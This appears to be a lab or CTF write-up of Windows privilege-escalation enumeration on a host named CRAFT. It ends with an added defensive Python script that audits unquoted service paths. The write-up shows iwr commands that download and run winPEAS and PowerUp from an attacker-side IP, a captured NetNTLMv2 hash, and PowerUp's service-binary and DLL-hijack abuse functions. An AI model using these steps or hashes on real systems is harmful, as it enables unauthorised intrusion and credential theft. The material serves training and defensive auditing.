PEAS
Running automated enumeration with winPEAS and PowerUp after the manual enumeration has been completed.
PS C:\tmp> iwr -Uri http://192.168.45.197/winPEASx64.exe -Outfile C:\tmp\winPEASx64.exe
Delivery complete
PS C:\tmp> ./winPEASx64.exe
[!] If you want to run the file analysis checks (search sensitive information in files), you need to specify the 'fileanalysis' or 'all' argument. Note that this search might take several minutes. For help, run winpeass.exe --help
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Executing PEAS
ENV
╔══════════╣ User Environment Variables
╚ Check for some passwords or keys in the env variables
COMPUTERNAME: CRAFT
PSExecutionPolicyPreference: Bypass
LIBO_VERSION: 7.1.4.2
LOCALAPPDATA: C:\Users\thecybergeek\AppData\Local
PSModulePath: C:\Users\thecybergeek\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
PROCESSOR_ARCHITECTURE: AMD64
Path: C:\Program Files\LibreOffice\program;C:\Program Files\LibreOffice\;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\thecybergeek\AppData\Local\Microsoft\WindowsApps;C:\Program Files\LibreOffice\program\..\program
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ProgramFiles(x86): C:\Program Files (x86)
PROCESSOR_LEVEL: 25
PYTHONPATH: C:\Program Files\LibreOffice\program\python-core-3.8.8\lib;C:\Program Files\LibreOffice\program\python-core-3.8.8\lib\site-packages;C:\Program Files\LibreOffice\program
ProgramFiles: C:\Program Files
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
LANGUAGE: en_US.UTF-8
SystemRoot: C:\Windows
ALLUSERSPROFILE: C:\ProgramData
DriverData: C:\Windows\System32\Drivers\DriverData
ProgramData: C:\ProgramData
PROCESSOR_REVISION: 0101
USERNAME: thecybergeek
CommonProgramW6432: C:\Program Files\Common Files
CommonProgramFiles: C:\Program Files\Common Files
OS: Windows_NT
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
ComSpec: C:\Windows\system32\cmd.exe
SystemDrive: C:
TEMP: C:\Users\THECYB~1\AppData\Local\Temp
PUBLIC: C:\Users\Public
NUMBER_OF_PROCESSORS: 2
APPDATA: C:\Users\thecybergeek\AppData\Roaming
URE_BOOTSTRAP: file:///C:/Program%20Files/LibreOffice/program/fundamental.ini
TMP: C:\Users\THECYB~1\AppData\Local\Temp
USERPROFILE: C:\Users\thecybergeek
ProgramW6432: C:\Program Files
windir: C:\Windows
USERDOMAIN: CRAFT
╔══════════╣ System Environment Variables
╚ Check for some passwords or keys in the env variables
ComSpec: C:\Windows\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
Path: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE: AMD64
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
TEMP: C:\Windows\TEMP
TMP: C:\Windows\TEMP
USERNAME: SYSTEM
windir: C:\Windows
NUMBER_OF_PROCESSORS: 2
PROCESSOR_LEVEL: 25
PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_REVISION: 0101
LAPS
LSA Protection
Credentials Guard
Cached Creds
AV
UAC
PowerShell
NTLM
thecybergeek::CRAFT:1122334455667788:4c718aa3412c2cb8895978b0627f8298:0101000000000000f650bb55b3a8db018ee94f8e54d49e23000000000800300030000000000000000000000000300000f0805dc4258da05ceb12eadfabf0164415e143bf8acb1b7adb7b7e42108231340a00100000000000000000000000000000000000090000000000000000000000
.NET
Services
Write access to the Apache directory
Modifiable
Installed Programs
Network
DNS Cached
Interesting Files
PowerUp
PS C:\tmp> iwr -Uri http://192.168.45.197/PowerUp.ps1 -Outfile C:\tmp\PowerUp.ps1
Delivery complete
PS C:\tmp> . .\PowerUp.ps1
PS C:\tmp> Invoke-AllChecks
ServiceName : ResumeService1
Path : C:\Program Files\nssm-2.24\win64\nssm.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users;
Permissions=AppendData/AddSubdirectory}
StartName : .\thecybergeek
AbuseFunction : Write-ServiceBinary -Name 'ResumeService1' -Path <HijackPath>
CanRestart : False
Name : ResumeService1
Check : Unquoted Service Paths
ServiceName : ResumeService1
Path : C:\Program Files\nssm-2.24\win64\nssm.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users;
Permissions=WriteData/AddFile}
StartName : .\thecybergeek
AbuseFunction : Write-ServiceBinary -Name 'ResumeService1' -Path <HijackPath>
CanRestart : False
Name : ResumeService1
Check : Unquoted Service Paths
ModifiablePath : C:\Users\thecybergeek\AppData\Local\Microsoft\WindowsApps
IdentityReference : CRAFT\thecybergeek
Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH% : C:\Users\thecybergeek\AppData\Local\Microsoft\WindowsApps
Name : C:\Users\thecybergeek\AppData\Local\Microsoft\WindowsApps
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath
'C:\Users\thecybergeek\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'
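The unquoted-service-path finding above is only a risk because PowerUp also reports that BUILTIN\Users hold WriteData/AddFile on C:\ (a subdirectory-only right such as AppendData/AddSubdirectory, which the default root ACL grants, is not enough on its own); the %PATH% .dll hijack entry, by contrast, is in the user's own PATH and writable only by that same user. The following script is an added example, not code from the writeup or from the PowerUp or winPEAS projects: given raw ImagePath strings (for instance exported with `Get-CimInstance Win32_Service | Select-Object Name, PathName`), it reproduces the CreateProcess lookup order for an unquoted path, marks the intermediate candidates whose parent directory is in a caller-supplied set of writable directories, and emits the quoted ImagePath that remediates the finding. Only the nssm.exe path and the C:\ entry come from the page; the other service entries are constructed.

```python
"""Audit Windows service ImagePath values for unquoted-path lookups.

Added example, not part of the original writeup. For each ImagePath it
lists the executables CreateProcess would try before the intended binary,
flags those whose directory is in a caller-supplied set of writable
directories, and returns the quoted remediation value.
"""
import ntpath
import re

# ResumeService1 is PowerUp's finding from the page; the other two entries
# are constructed for illustration (a correctly quoted path, and an
# unquoted path that carries arguments).
SAMPLE_SERVICES = {
    "ResumeService1": "C:\\Program Files\\nssm-2.24\\win64\\nssm.exe",
    "GoodSvc": '"C:\\Program Files\\Good Vendor\\svc.exe" -config "a b.cfg"',
    "ArgSvc": "C:\\Program Files\\Some Tool\\bin\\tool.exe -service -v",
}

# Directories reported as writable (WriteData/AddFile) for BUILTIN\Users on
# the page. In real use the caller supplies this set from an ACL review;
# a subdirectory-only right (AppendData/AddSubdirectory) does not count.
WRITABLE_DIRS = {"C:\\"}

# Heuristic: the executable ends at the first ".exe" that is followed by
# whitespace or the end of the string; whatever follows is the argument list.
EXE_RE = re.compile(r"^(.*?\.exe)(\s.*)?$", re.IGNORECASE)


def split_image_path(image_path):
    """Return (executable, args) for a raw ImagePath value."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end == -1:
            return s[1:], ""
        return s[1:end], s[end + 1:]
    m = EXE_RE.match(s)
    if m:
        return m.group(1), m.group(2) or ""
    return s, ""


def lookup_candidates(image_path):
    """Paths CreateProcess tries, in order, up to the intended executable.

    An unquoted path is split at every space; each prefix gets ".exe"
    appended and is tried before the next, longer prefix (this is the
    behaviour documented in the CreateProcess remarks). A quoted path
    yields exactly one candidate.
    """
    s = image_path.strip()
    exe, _ = split_image_path(s)
    if s.startswith('"'):
        return [exe]
    parts = exe.split(" ")
    cands = [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]
    cands.append(exe)
    return cands


def _norm(path):
    # Case-insensitive, trailing-backslash-insensitive directory comparison.
    return path.rstrip("\\").lower()


def audit(name, image_path, writable_dirs=WRITABLE_DIRS):
    """Classify one service. 'exposed' lists the intermediate candidates a
    low-privileged user could create because their parent is writable."""
    exe, args = split_image_path(image_path)
    cands = lookup_candidates(image_path)
    unquoted = len(cands) > 1
    writable = {_norm(d) for d in writable_dirs}
    exposed = [c for c in cands[:-1] if _norm(ntpath.dirname(c)) in writable]
    remediation = f'"{exe}"{args}' if unquoted else image_path
    return {
        "service": name,
        "unquoted": unquoted,
        "candidates": cands,
        "exposed": exposed,
        "remediation": remediation,
    }


if __name__ == "__main__":
    for svc, path in SAMPLE_SERVICES.items():
        r = audit(svc, path)
        flag = "RISK" if r["exposed"] else ("warn" if r["unquoted"] else "ok")
        print(f"[{flag}] {svc}: {path}")
        for c in r["exposed"]:
            print(f"       exposed lookup: {c}")
        if r["unquoted"]:
            print(f"       set ImagePath to: {r['remediation']}")
```

Run it as-is to see the three sample verdicts; in practice feed it the exported service list and the directories your ACL review found writable by non-administrators. The remediation is the same in every case: quote the executable portion of ImagePath (via `sc config <name> binPath=` or the registry) and remove the AddFile right on the root directory.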
Invoking